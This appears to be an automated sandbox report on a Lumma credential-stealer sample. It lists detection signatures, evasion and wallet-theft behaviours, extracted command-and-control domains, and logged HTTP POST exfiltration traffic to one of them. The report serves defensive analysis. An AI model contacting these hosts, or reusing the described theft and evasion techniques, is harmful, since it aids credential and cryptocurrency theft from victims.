Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NxqDwaYpbp.exe

Overview

General Information

Sample name:NxqDwaYpbp.exe
renamed because original name is a hash value
Original sample name:18a540ae13744f52861c16cb38c7dba4.exe
Analysis ID:1579986
MD5:18a540ae13744f52861c16cb38c7dba4
SHA1:c23aa96928ba43535c8d4915ad725c24cfbd61ec
SHA256:25e1f95be3a9448361402091d0a2862ffdbcfaa6a59acf955df9fa37dfd8dd93
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • NxqDwaYpbp.exe (PID: 8044 cmdline: "C:\Users\user\Desktop\NxqDwaYpbp.exe" MD5: 18A540AE13744F52861C16CB38C7DBA4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tentabatte.lat", "manyrestro.lat", "bashfulacid.lat", "observerfry.lat", "slipperyloo.lat", "wordyfindy.lat", "shapestickyr.lat", "talkynicer.lat", "curverpluch.lat"], "Build id": "PsFKDg--pablo"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1425952376.0000000000A7D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1423605757.0000000000A75000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1426155791.0000000000A37000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: NxqDwaYpbp.exe PID: 8044JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 3 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:41:10.914371+010020283713Unknown Traffic192.168.2.1049707104.21.36.201443TCP
                2024-12-23T17:41:12.900561+010020283713Unknown Traffic192.168.2.1049713104.21.36.201443TCP
                2024-12-23T17:41:15.281892+010020283713Unknown Traffic192.168.2.1049719104.21.36.201443TCP
                2024-12-23T17:41:18.537141+010020283713Unknown Traffic192.168.2.1049725104.21.36.201443TCP
                2024-12-23T17:41:20.831123+010020283713Unknown Traffic192.168.2.1049731104.21.36.201443TCP
                2024-12-23T17:41:23.493718+010020283713Unknown Traffic192.168.2.1049737104.21.36.201443TCP
                2024-12-23T17:41:26.141783+010020283713Unknown Traffic192.168.2.1049744104.21.36.201443TCP
                2024-12-23T17:41:29.370442+010020283713Unknown Traffic192.168.2.1049757104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:41:11.671562+010020546531A Network Trojan was detected192.168.2.1049707104.21.36.201443TCP
                2024-12-23T17:41:13.669950+010020546531A Network Trojan was detected192.168.2.1049713104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:41:11.671562+010020498361A Network Trojan was detected192.168.2.1049707104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:41:13.669950+010020498121A Network Trojan was detected192.168.2.1049713104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:41:24.310192+010020480941Malware Command and Control Activity Detected192.168.2.1049737104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:41:26.147194+010028438641A Network Trojan was detected192.168.2.1049744104.21.36.201443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: NxqDwaYpbp.exeAvira: detected
                Source: NxqDwaYpbp.exe.8044.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tentabatte.lat", "manyrestro.lat", "bashfulacid.lat", "observerfry.lat", "slipperyloo.lat", "wordyfindy.lat", "shapestickyr.lat", "talkynicer.lat", "curverpluch.lat"], "Build id": "PsFKDg--pablo"}
                Source: NxqDwaYpbp.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: NxqDwaYpbp.exeJoe Sandbox ML: detected
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: NxqDwaYpbp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49744 version: TLS 1.2
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49707 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49707 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49737 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.10:49744 -> 104.21.36.201:443
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Joe Sandbox ViewIP Address: 104.21.36.201 104.21.36.201
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49719 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49725 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49707 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49737 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49731 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49757 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49744 -> 104.21.36.201:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UQQCP3F4J93MFUWZ2CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12847Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T70EH3Y0C9S4S49OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15062Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MOCIQF2RN6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20388Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4IUN73V7IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1184Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A7GV7CTC5OUHRYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552952Host: observerfry.lat
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: NxqDwaYpbp.exe, 00000000.00000003.1447232506.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1489964702.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426155791.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447330697.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microH7
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: NxqDwaYpbp.exe, NxqDwaYpbp.exe, 00000000.00000002.1502000071.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1465436603.00000000053F7000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1504203509.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498419671.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342789562.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447099513.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1465605080.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1398027061.00000000053FC000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1465719103.0000000005404000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1375962675.00000000053FC000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1489890391.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1377126046.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: NxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/S
                Source: NxqDwaYpbp.exe, NxqDwaYpbp.exe, 00000000.00000002.1502000071.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1497935897.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498852378.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1399044992.00000000053F2000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501808419.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490071734.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498727425.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498419671.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501552431.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490243472.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1465605080.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1425952376.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447156583.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1398698974.00000000053F2000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490170370.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447156583.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1489890391.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: NxqDwaYpbp.exe, 00000000.00000003.1465605080.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1425952376.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447156583.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1489890391.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1452498320.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api-
                Source: NxqDwaYpbp.exe, 00000000.00000003.1399044992.00000000053F2000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1398698974.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apic
                Source: NxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apill
                Source: NxqDwaYpbp.exe, 00000000.00000003.1447232506.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apite
                Source: NxqDwaYpbp.exe, 00000000.00000003.1447156583.0000000000A83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apix
                Source: NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/b&
                Source: NxqDwaYpbp.exe, 00000000.00000002.1502000071.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498419671.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447156583.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1452498320.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/d
                Source: NxqDwaYpbp.exe, 00000000.00000003.1425952376.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/dY?
                Source: NxqDwaYpbp.exe, 00000000.00000003.1425952376.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/hv
